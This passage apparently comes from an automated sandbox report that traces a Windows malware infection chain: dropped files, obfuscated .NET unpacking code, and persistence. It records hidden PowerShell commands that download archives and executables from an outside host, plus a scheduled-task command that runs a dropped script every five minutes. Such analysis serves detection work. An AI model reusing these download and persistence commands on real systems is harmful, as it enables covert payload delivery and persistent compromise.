Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: winmm.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000023.00000000.3826513550.0000000000682000.00000002.00000001.01000000.00000012.sdmp, RegAsm.exe.24.dr
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000023.00000000.3826513550.0000000000682000.00000002.00000001.01000000.00000012.sdmp, RegAsm.exe.24.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 24.3.Carter.pif.426ba60.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1hDllwdT4WVgtLtvrh9HNTiswVDrK.eJw816nOtBnQZuwusfPwdeCqpzSPc,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._6VCrJCYx9STcmgqNj8H9Kfg3sUAts,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._4JfBy5iKF4dHKJv3wpolEJW2Kc5aN,_1hDllwdT4WVgtLtvrh9HNTiswVDrK.fUOnaw45vUZW9wRtPzKDoSUr7wQOr,GKj04XVvJiEzT5.o4DomEaaAK3Tvn()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2],GKj04XVvJiEzT5.HW4WcRdB9jpgvy(GKj04XVvJiEzT5.LnW574bP2vfKev(B7gC3ws7qAtINRZuxsMLlEJhLdYgq[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1hDllwdT4WVgtLtvrh9HNTiswVDrK.eJw816nOtBnQZuwusfPwdeCqpzSPc,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._6VCrJCYx9STcmgqNj8H9Kfg3sUAts,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._4JfBy5iKF4dHKJv3wpolEJW2Kc5aN,_1hDllwdT4WVgtLtvrh9HNTiswVDrK.fUOnaw45vUZW9wRtPzKDoSUr7wQOr,GKj04XVvJiEzT5.o4DomEaaAK3Tvn()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2],GKj04XVvJiEzT5.HW4WcRdB9jpgvy(GKj04XVvJiEzT5.LnW574bP2vfKev(B7gC3ws7qAtINRZuxsMLlEJhLdYgq[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 24.3.Carter.pif.426ba60.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd System.AppDomain.Load(byte[])
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17 System.AppDomain.Load(byte[])
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd System.AppDomain.Load(byte[])
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17 System.AppDomain.Load(byte[])
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 14_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

14_2_004062FC

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 14_3_0080204E push ebp; iretd	14_3_0080204F
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 14_3_00802064 push ebp; iretd	14_3_00802065
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 14_3_007FC70F push esp; retf 007Fh	14_3_007FCA01
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AA8B75 push ecx; ret	24_2_00AA8B88
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00248B75 push ecx; ret	32_2_00248B88

Source: 24.3.Carter.pif.426ba60.0.raw.unpack, OfpCuG0X22QLMT.cs	High entropy of concatenated method names: 'nYwX372KteT5t2', 'segcmNagSiz7hL', 'yb0jQST0YwMHe1', '_0RenYuPKc4bvZA', 'JZsQDAM9n6EtQO', 'nH0p3C37Fxk65v', 'wQuomVoWPHIdrS', 'KcyJvFgDlyg3yX', 'loFybsLcslp7YB', 'OqFzKE7yCCpgGL'
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, kqeFvQIpnkai8I7JJTganEHGxWh1A.cs	High entropy of concatenated method names: 'aRwUsZ42Qp2Iu55HZmFMSXPDzzjZF', 'r9VwT22LhaEvtkx68iMROo7ndw3YZ', 'jrU22mrrq7mmJu6zwT9QAgvUnX9CJ', 'V9WvHsnCndciRvznYV6E8Iiw7Ijry', 'sGZ2ry3eOxX0Kx', 'yIBnpeSQWl0II9', 'xgpfXiKspkv7Qk', '_43XjyQXj7XyIa1', 'a89z5bafQjfyZs', 'Tk551t0Ool3k8m'
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, GKj04XVvJiEzT5.cs	High entropy of concatenated method names: '_31TqwEG7d5XQHj', 'lxcCKU7qpJsmyP', 'YZYM9q6UFN8qLN', 'qbUFKJUwRHfrx0', 'yp447Ls9FeU2rB', 'v2qtSP4rX7Lk2T', '_913bZMPdi8gyo6', 'ub5OHWFnNsEeGb', 'J3wXGNI0TDWKm6', 'LnW574bP2vfKev'
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	High entropy of concatenated method names: 'A8tvE0DZ8bvmGcdzUXcKpnPMdpDux', 'W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd', 'ft4DTvZvc4qN6kRvp59xULzP1mvg8', 'h5DA5Rai9oL4jV2ulFHvRbWYSJygJ', 'O4KRgJLa3ckMhcPaD7WwIhODI7hWV', 'YWUQmw7KiGzjOEEcq4lQEbMvcLlhm', 'EJyK88GxspHTRmtV2qD89iF21FbSy', 'IhlkrpmLJYz1G6gP55j78Ej4gKn7F', 'm8302rRfONzkL3YJxiETt06WijQVn', 'P9l9FPyls55tddMfrIzTDmtDXAy1p'
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, 75lcEdvWjHm39L5ktP3tlqVbSoumD.cs	High entropy of concatenated method names: 'GLV28Q7RWReL58LNXG4dRIdIK2TEN', 'SqFko7T9STuWHJvrJgezXiBwfKMUK', 'W4PVwXl8ze5GoIs5LD920v8iPvDpI', 'VuiMLbYUZ5mbwdX2kA30fKD2DAOuV', 'lkt0AxMEBI88hk7IoXbH4QyieI6eA', 'lfIrGorQseyo6qZGq1AaQGw9LAMH7', 'mMD8nCbTfzppkmkizs1ZJLk6b6GTh', 'NAsi31w08xZTNd4EnIYvztAjeNjfl', 'dwTlKIVNZIbv7CCltiTquHRE8Fbjk', 'NAmq1jGo4CTjwh'
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, JbeTyT6ozehDZJ.cs	High entropy of concatenated method names: '_4qRRAkWwEHf3Zd', 'vRsh53PpGgdqA0', '_8Hq2Or18riYaIv', '_8mRH3Hyg3XD8u5', 'EdcUKUZTwxyIgi', '_6vgoIitpz9FToY', 'kF9NScHwDxQCcQ', 'ebBHLsDcmu1A20', 'sfMOP7twzn5TxB', 'TEyNm0Eygu7184'
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs	High entropy of concatenated method names: '_2mGh5CdvITFqIEgkpZMeXEYaYAyDB', '_9BeG36XnpwBXeXYTPZ4EKlMNJsvBQ', 'nZq2XPd9g1M2B2LsBPHPhOcwls9uQ', 'IXpGxkIWH8t4eoPAyitkJLIMPKWb6', 'w266axfymAlJYlHxOy7UD7CgTETRm', 'ImNQKUnqPr9jIMbbRrVqiJBKaucLC', 'hvtupL1aknPiuTNtO4sMyUTjVVlCG', 'LuqfnAbPcScBSkmye7C3NBjgwO957', 'qHF4AT3e2DvOntMCkk5fkm78V3UET', 'CLYFb0PcaLLnKDeZTkE3vmfjdeJfz'
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, OfpCuG0X22QLMT.cs	High entropy of concatenated method names: 'nYwX372KteT5t2', 'segcmNagSiz7hL', 'yb0jQST0YwMHe1', '_0RenYuPKc4bvZA', 'JZsQDAM9n6EtQO', 'nH0p3C37Fxk65v', 'wQuomVoWPHIdrS', 'KcyJvFgDlyg3yX', 'loFybsLcslp7YB', 'OqFzKE7yCCpgGL'
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, kqeFvQIpnkai8I7JJTganEHGxWh1A.cs	High entropy of concatenated method names: 'aRwUsZ42Qp2Iu55HZmFMSXPDzzjZF', 'r9VwT22LhaEvtkx68iMROo7ndw3YZ', 'jrU22mrrq7mmJu6zwT9QAgvUnX9CJ', 'V9WvHsnCndciRvznYV6E8Iiw7Ijry', 'sGZ2ry3eOxX0Kx', 'yIBnpeSQWl0II9', 'xgpfXiKspkv7Qk', '_43XjyQXj7XyIa1', 'a89z5bafQjfyZs', 'Tk551t0Ool3k8m'
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, GKj04XVvJiEzT5.cs	High entropy of concatenated method names: '_31TqwEG7d5XQHj', 'lxcCKU7qpJsmyP', 'YZYM9q6UFN8qLN', 'qbUFKJUwRHfrx0', 'yp447Ls9FeU2rB', 'v2qtSP4rX7Lk2T', '_913bZMPdi8gyo6', 'ub5OHWFnNsEeGb', 'J3wXGNI0TDWKm6', 'LnW574bP2vfKev'
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	High entropy of concatenated method names: 'A8tvE0DZ8bvmGcdzUXcKpnPMdpDux', 'W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd', 'ft4DTvZvc4qN6kRvp59xULzP1mvg8', 'h5DA5Rai9oL4jV2ulFHvRbWYSJygJ', 'O4KRgJLa3ckMhcPaD7WwIhODI7hWV', 'YWUQmw7KiGzjOEEcq4lQEbMvcLlhm', 'EJyK88GxspHTRmtV2qD89iF21FbSy', 'IhlkrpmLJYz1G6gP55j78Ej4gKn7F', 'm8302rRfONzkL3YJxiETt06WijQVn', 'P9l9FPyls55tddMfrIzTDmtDXAy1p'
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, 75lcEdvWjHm39L5ktP3tlqVbSoumD.cs	High entropy of concatenated method names: 'GLV28Q7RWReL58LNXG4dRIdIK2TEN', 'SqFko7T9STuWHJvrJgezXiBwfKMUK', 'W4PVwXl8ze5GoIs5LD920v8iPvDpI', 'VuiMLbYUZ5mbwdX2kA30fKD2DAOuV', 'lkt0AxMEBI88hk7IoXbH4QyieI6eA', 'lfIrGorQseyo6qZGq1AaQGw9LAMH7', 'mMD8nCbTfzppkmkizs1ZJLk6b6GTh', 'NAsi31w08xZTNd4EnIYvztAjeNjfl', 'dwTlKIVNZIbv7CCltiTquHRE8Fbjk', 'NAmq1jGo4CTjwh'
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, JbeTyT6ozehDZJ.cs	High entropy of concatenated method names: '_4qRRAkWwEHf3Zd', 'vRsh53PpGgdqA0', '_8Hq2Or18riYaIv', '_8mRH3Hyg3XD8u5', 'EdcUKUZTwxyIgi', '_6vgoIitpz9FToY', 'kF9NScHwDxQCcQ', 'ebBHLsDcmu1A20', 'sfMOP7twzn5TxB', 'TEyNm0Eygu7184'
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs	High entropy of concatenated method names: '_2mGh5CdvITFqIEgkpZMeXEYaYAyDB', '_9BeG36XnpwBXeXYTPZ4EKlMNJsvBQ', 'nZq2XPd9g1M2B2LsBPHPhOcwls9uQ', 'IXpGxkIWH8t4eoPAyitkJLIMPKWb6', 'w266axfymAlJYlHxOy7UD7CgTETRm', 'ImNQKUnqPr9jIMbbRrVqiJBKaucLC', 'hvtupL1aknPiuTNtO4sMyUTjVVlCG', 'LuqfnAbPcScBSkmye7C3NBjgwO957', 'qHF4AT3e2DvOntMCkk5fkm78V3UET', 'CLYFb0PcaLLnKDeZTkE3vmfjdeJfz'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	File created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	File created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	File created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00B059B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	24_2_00B059B3
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00A95EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	24_2_00A95EDA
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_002A59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	32_2_002A59B3
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00235EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	32_2_00235EDA

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AA33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

24_2_00AA33B7

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
